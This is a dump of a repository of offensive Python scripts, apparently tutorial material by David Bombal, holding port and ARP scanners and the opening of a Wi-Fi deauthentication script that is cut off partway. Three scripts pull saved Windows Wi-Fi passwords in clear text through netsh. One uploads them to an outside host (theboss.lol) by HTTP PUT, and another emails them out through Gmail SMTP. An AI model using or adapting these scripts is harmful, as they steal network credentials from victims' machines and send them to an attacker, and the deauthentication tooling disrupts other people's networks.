├── README.md
├── .idea
├── misc.xml
├── vcs.xml
├── inspectionProfiles
│ └── profiles_settings.xml
├── .gitignore
├── modules.xml
└── red-python-scripts.iml
├── LICENSE
├── lanscan_arp.py
├── nmap_port_scanner.py
├── windows10-wifi.py
├── windows10-wifi-rest.py
├── nmap_port_scanner_ip_obj.py
├── port_scanner_regex.py
├── windows10-wifi-email.py
├── port_scanner_ip_obj.py
├── wifidos.py
├── wifi_dos_type1.py
├── wifi_dos_type2.py
└── change-windows10-mac-address.py
/README.md:
--------------------------------------------------------------------------------
1 | # WiFi-DoS
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\Users\nikol\Desktop\red-python-scripts\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/red-python-scripts.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2021 davidbombal
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/lanscan_arp.py:
--------------------------------------------------------------------------------
1 | # Import scapy
2 | import scapy.all as scapy
3 | # We need to create regular expressions to ensure that the input is correctly formatted.
4 | import re
5 |
6 | # Basic user interface header
7 | print(r"""______ _ _ ______ _ _
8 | | _ \ (_) | | | ___ \ | | | |
9 | | | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
10 | | | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
11 | | |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
12 | |___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
13 | print("\n****************************************************************")
14 | print("\n* Copyright of David Bombal, 2021 *")
15 | print("\n* https://www.davidbombal.com *")
16 | print("\n* https://www.youtube.com/davidbombal *")
17 | print("\n****************************************************************")
18 |
19 | # Regular Expression Pattern to recognise IPv4 addresses.
20 | ip_add_range_pattern = re.compile("^(?:[0-9]{1,3}\.){3}[0-9]{1,3}/[0-9]*$")
21 |
22 | # Get the address range to ARP
23 | while True:
24 | ip_add_range_entered = input("\nPlease enter the ip address and range that you want to send the ARP request to (ex 192.168.1.0/24): ")
25 | if ip_add_range_pattern.search(ip_add_range_entered):
26 | print(f"{ip_add_range_entered} is a valid ip address range")
27 | break
28 |
29 |
30 | # Try ARPing the ip address range supplied by the user.
31 | # The arping() method in scapy creates a pakcet with an ARP message
32 | # and sends it to the broadcast mac address ff:ff:ff:ff:ff:ff.
33 | # If a valid ip address range was supplied the program will return
34 | # the list of all results.
35 | arp_result = scapy.arping(ip_add_range_entered)
36 |
--------------------------------------------------------------------------------
/nmap_port_scanner.py:
--------------------------------------------------------------------------------
1 | #Use these commands in Kali to install required software:
2 | # sudo apt install python3-pip
3 | # pip install python-nmap
4 |
5 | # Import nmap so we can use it for the scan
6 | import nmap
7 | # We need to create regular expressions to ensure that the input is correctly formatted.
8 | import re
9 |
10 | # Regular Expression Pattern to recognise IPv4 addresses.
11 | ip_add_pattern = re.compile("^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$")
12 | # Regular Expression Pattern to extract the number of ports you want to scan.
13 | # You have to specify - (ex 10-100)
14 | port_range_pattern = re.compile("([0-9]+)-([0-9]+)")
15 | # Initialising the port numbers, will be using the variables later on.
16 | port_min = 0
17 | port_max = 65535
18 |
19 | # This port scanner uses the Python nmap module.
20 | # You'll need to install the following to get it work on Linux:
21 | # Step 1: sudo apt install python3-pip
22 | # Step 2: pip install python-nmap
23 |
24 |
25 | # Basic user interface header
26 | print(r"""______ _ _ ______ _ _
27 | | _ \ (_) | | | ___ \ | | | |
28 | | | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
29 | | | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
30 | | |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
31 | |___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
32 | print("\n****************************************************************")
33 | print("\n* Copyright of David Bombal, 2021 *")
34 | print("\n* https://www.davidbombal.com *")
35 | print("\n* https://www.youtube.com/davidbombal *")
36 | print("\n****************************************************************")
37 |
38 | open_ports = []
39 | # Ask user to input the ip address they want to scan.
40 | while True:
41 | ip_add_entered = input("\nPlease enter the ip address that you want to scan: ")
42 | if ip_add_pattern.search(ip_add_entered):
43 | print(f"{ip_add_entered} is a valid ip address")
44 | break
45 |
46 | while True:
47 | # You can scan 0-65535 ports. This scanner is basic and doesn't use multithreading so scanning
48 | # all the ports is not advised.
49 | print("Please enter the range of ports you want to scan in format: - (ex would be 60-120)")
50 | port_range = input("Enter port range: ")
51 | port_range_valid = port_range_pattern.search(port_range.replace(" ",""))
52 | if port_range_valid:
53 | port_min = int(port_range_valid.group(1))
54 | port_max = int(port_range_valid.group(2))
55 | break
56 |
57 | nm = nmap.PortScanner()
58 | # We're looping over all of the ports in the specified range.
59 | for port in range(port_min, port_max + 1):
60 | try:
61 | # The result is quite interesting to look at. You may want to inspect the dictionary it returns.
62 | # It contains what was sent to the command line in addition to the port status we're after.
63 | # For in nmap for port 80 and ip 10.0.0.2 you'd run: nmap -oX - -p 89 -sV 10.0.0.2
64 | result = nm.scan(ip_add_entered, str(port))
65 | # Uncomment following line and look at dictionary
66 | # print(result)
67 | # We extract the port status from the returned object
68 | port_status = (result['scan'][ip_add_entered]['tcp'][port]['state'])
69 | print(f"Port {port} is {port_status}")
70 | except:
71 | # We cannot scan some ports and this ensures the program doesn't crash when we try to scan them.
72 | print(f"Cannot scan port {port}.")
73 |
74 |
--------------------------------------------------------------------------------
/windows10-wifi.py:
--------------------------------------------------------------------------------
1 | ######################################
2 | #Copyright of David Bombal, 2021 #
3 | #https://www.davidbombal.com #
4 | #https://www.youtube.com/davidbombal #
5 | ######################################
6 |
7 | # Import subprocess so we can use system commands
8 | import subprocess
9 |
10 | # Import the re module so that we can make use of regular expressions.
11 | import re
12 |
13 | # Python allows us to run system commands by using a function provided by the subprocess module
14 | # (subprocess.run(, ))
15 | # The script is a parent process and creates a child process which runs the system command,
16 | # and will only continue once the child process has completed.
17 | # To save the contents that gets sent to the standard output stream (the terminal)
18 | # we have to specify that we want to capture the output,
19 | # so we specify the second argument as capture_output = True.
20 | # This information gets stored in the stdout attribute.
21 | # The information is stored in bytes and we need to decode it to Unicode
22 | # before we use it as a String in Python.
23 | command_output = subprocess.run(["netsh", "wlan", "show", "profiles"], capture_output = True).stdout.decode()
24 |
25 | # We imported the re module so that we can make use of regular expressions.
26 | # We want to find all the Wifi names which is always listed after "ALL User Profile :".
27 | # In the regular expression we create a group of all characters until the return escape sequence (\r) appears.
28 | profile_names = (re.findall("All User Profile : (.*)\r", command_output))
29 |
30 | # We create an empty list outside of the loop where dictionaries with all the wifi
31 | # username and passwords will be saved.
32 | wifi_list = list()
33 |
34 | # If we didn't find profile names we didn't have any wifi connections,
35 | # so we only run the part to check for the details of the wifi and
36 | # whether we can get their passwords in this part.
37 | if len(profile_names) != 0:
38 | for name in profile_names:
39 | # Every wifi connection will need its own dictionary which will be appended to the wifi_list
40 | wifi_profile = dict()
41 | # We now run a more specific command to see the information about the specific wifi connection
42 | # and if the Security key is not absent we can possibly get the password.
43 | profile_info = subprocess.run(["netsh", "wlan", "show", "profile", name], capture_output = True).stdout.decode()
44 | # We use a regular expression to only look for the absent cases so we can ignore them.
45 | if re.search("Security key : Absent", profile_info):
46 | continue
47 | else:
48 | # Assign the ssid of the wifi profile to the dictionary
49 | wifi_profile["ssid"] = name
50 | # These cases aren't absent and we should run them "key=clear" command part to get the password
51 | profile_info_pass = subprocess.run(["netsh", "wlan", "show", "profile", name, "key=clear"], capture_output = True).stdout.decode()
52 | # Again run the regular expressions to capture the group after the : which is the password
53 | password = re.search("Key Content : (.*)\r", profile_info_pass)
54 | # Check if we found a password in the regular expression. All wifi connections will not have passwords.
55 | if password == None:
56 | wifi_profile["password"] = None
57 | else:
58 | # We assign the grouping (Where the password is contained) we are interested to the password key in the dictionary.
59 | wifi_profile["password"] = password[1]
60 | # We append the wifi information to the wifi_list
61 | wifi_list.append(wifi_profile)
62 |
63 | for x in range(len(wifi_list)):
64 | print(wifi_list[x])
65 |
66 |
--------------------------------------------------------------------------------
/windows10-wifi-rest.py:
--------------------------------------------------------------------------------
1 | ######################################
2 | #Copyright of David Bombal, 2021 #
3 | #https://www.davidbombal.com #
4 | #https://www.youtube.com/davidbombal #
5 | ######################################
6 | import subprocess
7 | import re
8 | import requests
9 |
10 | # Python allows us to run system commands by using a function provided by the subprocess module (subprocess.run(, ))
11 | # The script is a parent process and creates a child process which runs the system command, and will only continue once the child process has completed.
12 | # To save the contents that gets sent to the standard output stream (the terminal) we have to specify that we want to capture the output, so we specify the second argument as capture_output = True. This information gets stored in the stdout attribute. The information is stored in bytes and we need to decode it to Unicode before we use it as a String in Python.
13 | command_output = subprocess.run(["netsh", "wlan", "show", "profiles"], capture_output = True).stdout.decode()
14 |
15 | # We imported the re module so that we can make use of regular expressions. We want to find all the Wifi names which is always listed after "ALL User Profile :". In the regular expression we create a group of all characters until the return escape sequence (\r) appears.
16 | profile_names = (re.findall("All User Profile : (.*)\r", command_output))
17 |
18 | # We create an empty list outside of the loop where dictionaries with all the wifi ssid and passwords will be saved.
19 | wifi_list = list()
20 |
21 |
22 | # If we didn't find profile names we didn't have any wifi connections, so we only run the part to check for the details of the wifi and whether we can get their passwords in this part.
23 | if len(profile_names) != 0:
24 | for name in profile_names:
25 | # Every wifi connection will need its own dictionary which will be appended to the wifi_list
26 | wifi_profile = dict()
27 | # We now run a more specific command to see the information about the specific wifi connection and if the Security key is not absent we can possibly get the password.
28 | profile_info = subprocess.run(["netsh", "wlan", "show", "profile", name], capture_output = True).stdout.decode()
29 | # We use a regular expression to only look for the absent cases so we can ignore them.
30 | if re.search("Security key : Absent", profile_info):
31 | continue
32 | else:
33 | # Assign the SSID of the wifi profile to the dictionary
34 | wifi_profile["ssid"] = name
35 | # These cases aren't absent and we should run them "key=clear" command part to get the password
36 | profile_info_pass = subprocess.run(["netsh", "wlan", "show", "profile", name, "key=clear"], capture_output = True).stdout.decode()
37 | # Again run the regular expressions to capture the group after the : which is the password
38 | password = re.search("Key Content : (.*)\r", profile_info_pass)
39 | # Check if we found a password in the regular expression. All wifi connections will not have passwords.
40 | if password == None:
41 | wifi_profile["password"] = None
42 | else:
43 | # We assign the grouping (Where the password is contained) we are interested to the password key in the dictionary.
44 | wifi_profile["password"] = password[1]
45 | # We append the wifi information to the wifi_list
46 | wifi_list.append(wifi_profile)
47 |
48 |
49 | # Write the contents of the wifi ssids and passwords to file
50 | with open('wifi.txt', 'w+') as fh:
51 | for x in wifi_list:
52 | fh.write(f"SSID: {x['ssid']}\nPassword: {x['password']}\n")
53 |
54 | # Open file with read-only in binary so you can send via API
55 | with open('wifi.txt', 'rb') as fh:
56 | # Do put request with the data as the file
57 | r = requests.put("http://theboss.lol/", data=fh)
58 | # status code should be 200 if successful
59 | if r.status_code == 200:
60 | print('Success')
61 |
--------------------------------------------------------------------------------
/nmap_port_scanner_ip_obj.py:
--------------------------------------------------------------------------------
1 | #Use these commands in Kali to install required software:
2 | # sudo apt install python3-pip
3 | # pip install python-nmap
4 |
5 | # Import nmap so we can use it for the scan
6 | import nmap
7 | # We import the ipaddress module. We want to use the ipaddress.ip_address(address)
8 | # method to see if we can instantiate a valid ip address to test.
9 | import ipaddress
10 | # We need to create regular expressions to ensure that the input is correctly formatted.
11 | import re
12 |
13 | # Regular Expression Pattern to extract the number of ports you want to scan.
14 | # You have to specify - (ex 10-100)
15 | port_range_pattern = re.compile("([0-9]+)-([0-9]+)")
16 | # Initialising the port numbers, will be using the variables later on.
17 | port_min = 0
18 | port_max = 65535
19 |
20 | # This port scanner uses the Python nmap module.
21 | # You'll need to install the following to get it work on Linux:
22 | # Step 1: sudo apt install python3-pip
23 | # Step 2: pip install python-nmap
24 |
25 |
26 | # Basic user interface header
27 | print(r"""______ _ _ ______ _ _
28 | | _ \ (_) | | | ___ \ | | | |
29 | | | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
30 | | | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
31 | | |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
32 | |___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
33 | print("\n****************************************************************")
34 | print("\n* Copyright of David Bombal, 2021 *")
35 | print("\n* https://www.davidbombal.com *")
36 | print("\n* https://www.youtube.com/davidbombal *")
37 | print("\n****************************************************************")
38 |
39 | # Ask user to input the ip address they want to scan.
40 | while True:
41 | ip_add_entered = input("\nPlease enter the ip address that you want to scan: ")
42 | # If we enter an invalid ip address the try except block will go to the except block and say you entered an invalid ip address.
43 | try:
44 | ip_address_obj = ipaddress.ip_address(ip_add_entered)
45 | # The following line will only execute if the ip is valid.
46 | print("You entered a valid ip address.")
47 | break
48 | except:
49 | print("You entered an invalid ip address")
50 |
51 |
52 | while True:
53 | # You can scan 0-65535 ports. This scanner is basic and doesn't use multithreading so scanning all the ports is not advised.
54 | print("Please enter the range of ports you want to scan in format: - (ex would be 60-120)")
55 | port_range = input("Enter port range: ")
56 | # We pass the port numbers in by removing extra spaces that people sometimes enter. So if you enter 80 - 90 instead of 80-90 the program will still work.
57 | port_range_valid = port_range_pattern.search(port_range.replace(" ",""))
58 | if port_range_valid:
59 | # We're extracting the low end of the port scanner range the user want to scan.
60 | port_min = int(port_range_valid.group(1))
61 | # We're extracting the upper end of the port scanner range the user want to scan.
62 | port_max = int(port_range_valid.group(2))
63 | break
64 |
65 | nm = nmap.PortScanner()
66 | # We're looping over all of the ports in the specified range.
67 | for port in range(port_min, port_max + 1):
68 | try:
69 | # The result is quite interesting to look at. You may want to inspect the dictionary it returns.
70 | # It contains what was sent to the command line in addition to the port status we're after.
71 | # For in nmap for port 80 and ip 10.0.0.2 you'd run: nmap -oX - -p 89 -sV 10.0.0.2
72 | result = nm.scan(ip_add_entered, str(port))
73 | # Uncomment following line and look at dictionary
74 | # print(result)
75 | # We extract the port status from the returned object
76 | port_status = (result['scan'][ip_add_entered]['tcp'][port]['state'])
77 | print(f"Port {port} is {port_status}")
78 | except:
79 | # We cannot scan some ports and this ensures the program doesn't crash when we try to scan them.
80 | print(f"Cannot scan port {port}.")
81 |
--------------------------------------------------------------------------------
/port_scanner_regex.py:
--------------------------------------------------------------------------------
1 | # The socket module in Python is an interface to the Berkeley sockets API.
2 | import socket
3 | # We need to create regular expressions to ensure that the input is correctly formatted.
4 | import re
5 |
6 | # Regular Expression Pattern to recognise IPv4 addresses.
7 | ip_add_pattern = re.compile("^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$")
8 | # Regular Expression Pattern to extract the number of ports you want to scan.
9 | # You have to specify - (ex 10-100)
10 | port_range_pattern = re.compile("([0-9]+)-([0-9]+)")
11 | # Initialising the port numbers, will be using the variables later on.
12 | port_min = 0
13 | port_max = 65535
14 |
15 | # This script uses the socket api to see if you can connect to a port on a specified ip address.
16 | # Once you've successfully connected a port is seen as open.
17 | # This script does not discriminate the difference between filtered and closed ports.
18 |
19 | # Basic user interface header
20 | print(r"""______ _ _ ______ _ _
21 | | _ \ (_) | | | ___ \ | | | |
22 | | | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
23 | | | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
24 | | |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
25 | |___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
26 | print("\n****************************************************************")
27 | print("\n* Copyright of David Bombal, 2021 *")
28 | print("\n* https://www.davidbombal.com *")
29 | print("\n* https://www.youtube.com/davidbombal *")
30 | print("\n****************************************************************")
31 |
32 | open_ports = []
33 | # Ask user to input the ip address they want to scan.
34 | while True:
35 | ip_add_entered = input("\nPlease enter the ip address that you want to scan: ")
36 | if ip_add_pattern.search(ip_add_entered):
37 | print(f"{ip_add_entered} is a valid ip address")
38 | break
39 |
40 | while True:
41 | # You can scan 0-65535 ports. This scanner is basic and doesn't use multithreading so scanning all
42 | # the ports is not advised.
43 | print("Please enter the range of ports you want to scan in format: - (ex would be 60-120)")
44 | port_range = input("Enter port range: ")
45 | port_range_valid = port_range_pattern.search(port_range.replace(" ",""))
46 | if port_range_valid:
47 | port_min = int(port_range_valid.group(1))
48 | port_max = int(port_range_valid.group(2))
49 | break
50 |
51 | # Basic socket port scanning
52 | for port in range(port_min, port_max + 1):
53 | # Connect to socket of target machine. We need the ip address and the port number we want to connect to.
54 | try:
55 | # Create a socket object
56 | # You can create a socket connection similar to opening a file in Python.
57 | # We can change the code to allow for domain names as well.
58 | # With socket.AF_INET you can enter either a domain name or an ip address
59 | # and it will then continue with the connection.
60 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
61 | # You want to set a timeout for the socket to try and connect to the server.
62 | # If you make the duration longer it will return better results.
63 | # We put it at 0.5s. So for every port it scans it will allow 0.5s
64 | # for a successful connection.
65 | s.settimeout(0.5)
66 | # We use the socket object we created to connect to the ip address we entered
67 | # and the port number. If it can't connect to this socket it will cause an
68 | # exception and the open_ports list will not append the value.
69 | s.connect((ip_add_entered, port))
70 | # If the following line runs then then it was successful in connecting to the port.
71 | open_ports.append(port)
72 |
73 | except:
74 | # We don't need to do anything here. If we were interested in the closed ports we'd put something here.
75 | pass
76 |
77 | # We only care about the open ports.
78 | for port in open_ports:
79 | # We use an f string to easily format the string with variables so we don't have to do concatenation.
80 | print(f"Port {port} is open on {ip_add_entered}.")
81 |
--------------------------------------------------------------------------------
/windows10-wifi-email.py:
--------------------------------------------------------------------------------
1 | ######################################
2 | #Copyright of David Bombal, 2021 #
3 | #https://www.davidbombal.com #
4 | #https://www.youtube.com/davidbombal #
5 | ######################################
6 | import subprocess
7 | import re
8 | import smtplib
9 | from email.message import EmailMessage
10 |
11 | # Python allows us to run system commands by using a function provided by the subprocess module (subprocess.run(, ))
12 | # The script is a parent process and creates a child process which runs the system command, and will only continue once the child process has completed.
13 | # To save the contents that gets sent to the standard output stream (the terminal) we have to specify that we want to capture the output, so we specify the second argument as capture_output = True. This information gets stored in the stdout attribute. The information is stored in bytes and we need to decode it to Unicode before we use it as a String in Python.
14 | command_output = subprocess.run(["netsh", "wlan", "show", "profiles"], capture_output = True).stdout.decode()
15 |
16 | # We imported the re module so that we can make use of regular expressions. We want to find all the Wifi names which is always listed after "ALL User Profile :". In the regular expression we create a group of all characters until the return escape sequence (\r) appears.
17 | profile_names = (re.findall("All User Profile : (.*)\r", command_output))
18 |
19 | # We create an empty list outside of the loop where dictionaries with all the wifi username and passwords will be saved.
20 | wifi_list = list()
21 |
22 |
23 | # If we didn't find profile names we didn't have any wifi connections, so we only run the part to check for the details of the wifi and whether we can get their passwords in this part.
24 | if len(profile_names) != 0:
25 | for name in profile_names:
26 | # Every wifi connection will need its own dictionary which will be appended to the wifi_list
27 | wifi_profile = dict()
28 | # We now run a more specific command to see the information about the specific wifi connection and if the Security key is not absent we can possibly get the password.
29 | profile_info = subprocess.run(["netsh", "wlan", "show", "profile", name], capture_output = True).stdout.decode()
30 | # We use a regular expression to only look for the absent cases so we can ignore them.
31 | if re.search("Security key : Absent", profile_info):
32 | continue
33 | else:
34 | # Assign the ssid of the wifi profile to the dictionary
35 | wifi_profile["ssid"] = name
36 | # These cases aren't absent and we should run them "key=clear" command part to get the password
37 | profile_info_pass = subprocess.run(["netsh", "wlan", "show", "profile", name, "key=clear"], capture_output = True).stdout.decode()
38 | # Again run the regular expressions to capture the group after the : which is the password
39 | password = re.search("Key Content : (.*)\r", profile_info_pass)
40 | # Check if we found a password in the regular expression. All wifi connections will not have passwords.
41 | if password == None:
42 | wifi_profile["password"] = None
43 | else:
44 | # We assign the grouping (Where the password is contained) we are interested to the password key in the dictionary.
45 | wifi_profile["password"] = password[1]
46 | # We append the wifi information to the wifi_list
47 | wifi_list.append(wifi_profile)
48 |
49 | # Create the message for the email
50 | email_message = ""
51 | for item in wifi_list:
52 | email_message += f"SSID: {item['ssid']}, Password: {item['password']}\n"
53 |
54 | # Create EmailMessage Object
55 | email = EmailMessage()
56 | # Who is the email from
57 | email["from"] = "name_of_sender"
58 | # To which email you want to send the email
59 | email["to"] = "email_address"
60 | # Subject of the email
61 | email["subject"] = "WiFi SSIDs and Passwords"
62 | email.set_content(email_message)
63 |
64 | # Create smtp server
65 | with smtplib.SMTP(host="smtp.gmail.com", port=587) as smtp:
66 | smtp.ehlo()
67 | # Connect securely to server
68 | smtp.starttls()
69 | # Login using username and password to dummy email. Remember to set email to allow less secure apps if using Gmail
70 | smtp.login("login_name", "password")
71 | # Send email.
72 | smtp.send_message(email)
73 |
--------------------------------------------------------------------------------
/port_scanner_ip_obj.py:
--------------------------------------------------------------------------------
1 | # The socket module in Python is an interface to the Berkeley sockets API.
2 | import socket
3 | # We import the ipaddress module. We want to use the ipaddress.ip_address(address)
4 | # method to see if we can instantiate a valid ip address to test.
5 | import ipaddress
6 | # We need to create regular expressions to ensure that the input is correctly formatted.
7 | import re
8 |
9 | # Regular Expression Pattern to extract the number of ports you want to scan.
10 | # You have to specify - (ex 10-100)
11 | port_range_pattern = re.compile("([0-9]+)-([0-9]+)")
12 | # Initialising the port numbers, will be using the variables later on.
13 | port_min = 0
14 | port_max = 65535
15 |
16 | # This script uses the socket api to see if you can connect to a port on a specified ip address.
17 | # Once you've successfully connected a port is seen as open.
18 | # This script does not discriminate the difference between filtered and closed ports.
19 |
20 | # Basic user interface header
21 | print(r"""______ _ _ ______ _ _
22 | | _ \ (_) | | | ___ \ | | | |
23 | | | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
24 | | | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
25 | | |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
26 | |___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
27 | print("\n****************************************************************")
28 | print("\n* Copyright of David Bombal, 2021 *")
29 | print("\n* https://www.davidbombal.com *")
30 | print("\n* https://www.youtube.com/davidbombal *")
31 | print("\n****************************************************************")
32 |
33 | open_ports = []
34 | # Ask user to input the ip address they want to scan.
35 | while True:
36 | ip_add_entered = input("\nPlease enter the ip address that you want to scan: ")
37 | # If we enter an invalid ip address the try except block will go to the except block and say you entered an invalid ip address.
38 | try:
39 | ip_address_obj = ipaddress.ip_address(ip_add_entered)
40 | # The following line will only execute if the ip is valid.
41 | print("You entered a valid ip address.")
42 | break
43 | except:
44 | print("You entered an invalid ip address")
45 |
46 |
47 | while True:
48 | # You can scan 0-65535 ports. This scanner is basic and doesn't use multithreading so scanning all
49 | # the ports is not advised.
50 | print("Please enter the range of ports you want to scan in format: - (ex would be 60-120)")
51 | port_range = input("Enter port range: ")
52 | # We pass the port numbers in by removing extra spaces that people sometimes enter.
53 | # So if you enter 80 - 90 instead of 80-90 the program will still work.
54 | port_range_valid = port_range_pattern.search(port_range.replace(" ",""))
55 | if port_range_valid:
56 | # We're extracting the low end of the port scanner range the user want to scan.
57 | port_min = int(port_range_valid.group(1))
58 | # We're extracting the upper end of the port scanner range the user want to scan.
59 | port_max = int(port_range_valid.group(2))
60 | break
61 |
62 | # Basic socket port scanning
63 | for port in range(port_min, port_max + 1):
64 | # Connect to socket of target machine. We need the ip address and the port number we want to connect to.
65 | try:
66 | # Create a socket object
67 | # You can create a socket connection similar to opening a file in Python.
68 | # We can change the code to allow for domain names as well.
69 | # With socket.AF_INET you can enter either a domain name or an ip address
70 | # and it will then continue with the connection.
71 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
72 | # You want to set a timeout for the socket to try and connect to the server.
73 | # If you make the duration longer it will return better results.
74 | # We put it at 0.5s. So for every port it scans it will allow 0.5s
75 | # for a successful connection.
76 | s.settimeout(0.5)
77 | # We use the socket object we created to connect to the ip address we entered and the port number.
78 | # If it can't connect to this socket it will cause an exception and the open_ports list will not
79 | # append the value.
80 | s.connect((ip_add_entered, port))
81 | # If the following line runs then then it was successful in connecting to the port.
82 | open_ports.append(port)
83 |
84 | except:
85 | # We don't need to do anything here. If we were interested in the closed ports we'd put something here.
86 | pass
87 |
88 | # We only care about the open ports.
89 | for port in open_ports:
90 | # We use an f string to easily format the string with variables so we don't have to do concatenation.
91 | print(f"Port {port} is open on {ip_add_entered}.")
92 |
--------------------------------------------------------------------------------
/wifidos.py:
--------------------------------------------------------------------------------
1 | # Disclaimer: This script is for educational purposes only. Do not use against any network that you don't own or have authorization to test.
2 |
3 | # We will be using the subprocess module to run commands on Kali Linux.
4 | import subprocess
5 | # We require regular expressions.
6 | import re
7 | # We want to open the CSV files generated by airmon-ng,
8 | # and we'll use the built-in csv module.
9 | import csv
10 | # We want to import os because we want to check for sudo
11 | import os
12 | # We want to use time.sleep()
13 | import sys
14 | import time
15 | # We want to move .csv files in the folder if we found any.
16 | # We'll use shutil for that.
17 | import shutil
18 | # Create a timestamp for .csv filename
19 | from datetime import datetime
20 |
21 | # Create an empty list
22 | active_wireless_networks = []
23 |
24 | # We use this function to test if the ESSID is already in the list file.
25 | # If so we return False so we don't add it again.
26 | # If it is not in the lst we return True which will instruct the elif
27 | # statement to add it to the lst.
28 | def check_for_essid(essid, lst):
29 | check_status = True
30 |
31 | # If no ESSIDs in list add the row
32 | if len(lst) == 0:
33 | return check_status
34 |
35 | # This will only run if there are wireless access points in the list.
36 | for item in lst:
37 | # If True don't add to list. False will add it to list
38 | if essid in item["ESSID"]:
39 | check_status = False
40 |
41 | return check_status
42 |
43 | # Basic user interface header
44 | print(r"""
45 | ..#....#....######....#...#.....######....#...#...
46 | ..##...#......##......#..#......#....#....#..#....
47 | ..#.#..#......##......##........######....##......
48 | ..#..#.#......##......#..#......#....#....#..#....
49 | ..#...##....######....#...#.....#....#....#...#...
50 | """)
51 | print("\n****************************************************************")
52 | print("\n* Copyright of David Bombal, 2021 *")
53 | print("\n* I have permission to change and upgrade code *")
54 | print("\n* code updated by Nika Kachibaia *")
55 | print("\n****************************************************************")
56 |
57 |
58 | # If the user doesn't run the program with super user privileges, don't allow them to continue.
59 | if not 'SUDO_UID' in os.environ.keys():
60 | print("Try running this program with sudo.")
61 | exit()
62 |
63 | # Remove .csv files before running the script.
64 | for file_name in os.listdir():
65 | # We should only have one csv file as we delete them from the folder
66 | # every time we run the program.
67 | if ".csv" in file_name:
68 | print("There shouldn't be any .csv files in your directory. We found .csv files in your directory and will move them to the backup directory.")
69 | # We get the current working directory.
70 | directory = os.getcwd()
71 | try:
72 | # We make a new directory called /backup
73 | os.mkdir(directory + "/backup/")
74 | except:
75 | print("Backup folder exists.")
76 | # Create a timestamp
77 | timestamp = datetime.now()
78 | # We move any .csv files in the folder to the backup folder.
79 | shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
80 |
81 | # Regex to find wireless interfaces. We're making the assumption they will all be wlan0 or higher.
82 | wlan_pattern = re.compile("^wlan[0-9]+")
83 |
84 | # Python allows is to run system commands by using a function provided by the subprocess module.
85 | # subprocess.run()
86 | # The script is the parent process and creates a child process which runs the system command,
87 | # and will only continue once the child process has completed.
88 | # We run the iwconfig command to look for wireless interfaces.
89 | check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode())
90 |
91 | # No WiFi Adapter connected.
92 | if len(check_wifi_result) == 0:
93 | print("Please connect a WiFi adapter and try again.")
